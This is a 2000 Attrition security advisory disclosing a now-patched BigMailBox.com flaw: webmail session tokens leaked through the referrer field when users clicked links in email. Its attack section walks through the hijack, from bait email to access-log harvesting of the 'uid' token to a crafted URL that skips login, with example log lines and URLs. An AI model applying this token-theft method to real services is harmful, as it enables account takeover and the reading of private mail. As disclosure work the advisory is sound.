attrition.2000-02-21.bigmailbox                     Thu Feb 10 10:57:57 CST 2000


Vendor: BigMailBox.com                              Platform: All

                   Attrition's Little Errata Report Team

                        -<)  A . L . E . R . T  (>-

     -----------------------------------------------------------------
       This advisory reports  a  recently-discovered security issue.
       It may contain a workaround or information on where to obtain
       an appropriate patch.  Advisories should be considered urgent
       as these notices are written only when the likelihood of wide
       impact is determined by the Attrition staff.  An HTML version
       of this and other advisories can be found at Attrition.Org at
       http://www.attrition.org/security/
     -----------------------------------------------------------------

  BigMailBox.com href tokens leave mailboxes open to control by a malicious site


AFFECTED SYSTEMS
---------------------------------------------------------------------------
- Users of the BigMailBox.com email
- Users of freemail systems run by BigMailBox.com


STATUS
---------------------------------------------------------------------------
BigMailBox.com was notified of the problem on Fri, 11 Feb 2000. After
additional testing and verification, staff of BigMailBox.com patched
the vulnerability on Mon, 14 Feb 2000.


BACKGROUND
---------------------------------------------------------------------------
BigMailBox.com (http://www.bigmailbox.com) offers free Web-based email
services with the site's domain name.  BigMailBox.com also offers individual
email accounts through the portal site www.gohip.com (http://www.gohip.com).
We were able to find over 100 domains using BigMailBox.com to host their
email services, including, Antionline (http ://www.antionline.com), Teen Zone
(http://www.teenzone.com), Anonymous.to (http://www.anonymous.to), CashPile 
(http://www.cashpile.com), and TeamsterNet (http://www.teamster.net).  As
can be seen from this list, most of these are smaller portal sites using
free email for repeat traffic.


BUG REPORT
---------------------------------------------------------------------------
As we browse the web, client programs such as Netscape and Internet Explorer
forward a variable from one web server to another based on hyperlinks. This
variable is called an HREF. It contains the URL of the site that referred the
user to another server. When the web visitor clicks on a hyperlink, the HREF
variable is forwarded to the next server, where it appears in the access logs.
Looking at a sample entry of an access log:

  your.machine.com - - [10/Feb/2000:22:34:30 -0700] "GET /index.html HTTP/1.0"
  200 48797 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"

This shows that your.machine.com requested a web page "/index.html" on the
server, and that you found this link from a web page hosted on
remote.site.com.

BigMailBox.com uses a session token to manage access to the mail box.  This
session token tells the system that a user is logged in and accessing mail.
When the user logs out, the session token is automatically expired, forcing
the user to log in which generates a fresh token. Without logging out, this
token defaults to expire one hour after initial login.

Unfortunately, this session token is forwarded to a web site via the HREF
variable if a link is followed from an email message. With this valid session
token, users reading these logs can use the information to log into the
BigMailBox.com web email accounts without authentication.

Several factors contribute to this being a serious problem.

        *  Many systems keep access logs world readable, so that any
           system user could glean the session key from the logs.

        *  Because of the standard format of the URL required to access
           the email, it is trivial to construct a valid URL along with
           a current session token allowing a third party to view the
           mail box.

        *  BigMailBox.com's web based mail client automatically converts
           all URL's into hotlinks to the site.

        *  With the knowledge of the above, a third party can send
           the user mail with a specific URL, encouraging them to visit
           a site where the session token could be read.


THE ATTACK

1. A potential attacker sends the target a piece of e-mail with a 'bait'
   URL, in hopes of prompting them to follow the link. For example,
   sending mail to victim@antionline.org with a URL for them to visit:

     http://www.myserver.com/visit/me.html

2. BigMailBox receives the e-mail and converts the URL into a clickable
   hotlink. The victim reads the e-mail and follows the link with a
   single click.

3. www.myserver.com records the hit to its access_log where the attacker
   is waiting. The attacker views the HREF of the entry:

     http://mail12.bigmailbox.com/users/antionlineorg/mail.cgi?act
     =viewPP=root/&fol=Inbox&mid=s00000006&mn=2&tm=2&st=A&sf
     =2&un=victim&uid=BVZkfObYaz4BZUXWkxPz2ZAvt

   Using the HREF, the attacker extracts the e-mail account name designated
   by "un=" (UserName). In the example above: victim

   Looking closely at the end of the HREF, the attacker extracts the last
   field designated by "uid=", which is the current session token. In this
   example, the session token is: BVZkfObYaz4BZUXWkxPz2ZAvt

4. Using the two fields, the attacker crafts a new URL:

     http://mail12.bigmailbox.com/users/antionlineorg/go.cgi?act
     =list&fol=InboxPP=root&un=victim&uid=BVZkfObYaz4BZUXWkxPz2ZAvt

   Putting this into their own browser, they can bypass the login procedure
   and access the web based e-mail account unchallenged.

>From this point, the attacker wields full control over the account
and may do a number of things:

        * Send mail to anyone as the legitimate user

        * Read and manipulate any mail already received
        
        * Change the default timeout from one hour to three hours

        * Modify user account information



RECOMMENDED ACTIONS
---------------------------------------------------------------------------
Never click on a URL sent to you via e-mail to any BigMailBox.com email
account. Instead, cut and paste the URL into your browser to visit a site.

Contact BigMailBox and complain about shoddy and insecure e-mail access.


RANT
---------------------------------------------------------------------------
How many times must the security community point out trivial vulnerabilities
like this? Worse, that 'security' and 'privacy' oriented sites like
AntiOnline and Anonymous.to would utilize such insecure third party
servers without testing or auditing them to maintain a reasonable level
of security.


CREDITS
---------------------------------------------------------------------------
ADVISORY: Authored by Munge and Jericho

VULNERABILITY: Found by Mcintyre


CONTACT INFORMATION
---------------------------------------------------------------------------
Questions regarding this advisory or information regarding new advisories
and potential vulnerabilities should be directed to ALERT using one of the
following methods:

E-Mail: alert@attrition.org
WWW   : http://www.attrition.org/security/attrition.html

The ALERT PGP Public Key (PGP v2.6.2, RSA) is available at:
http://www.attrition.org/security/advisory/attrition/pubkey.txt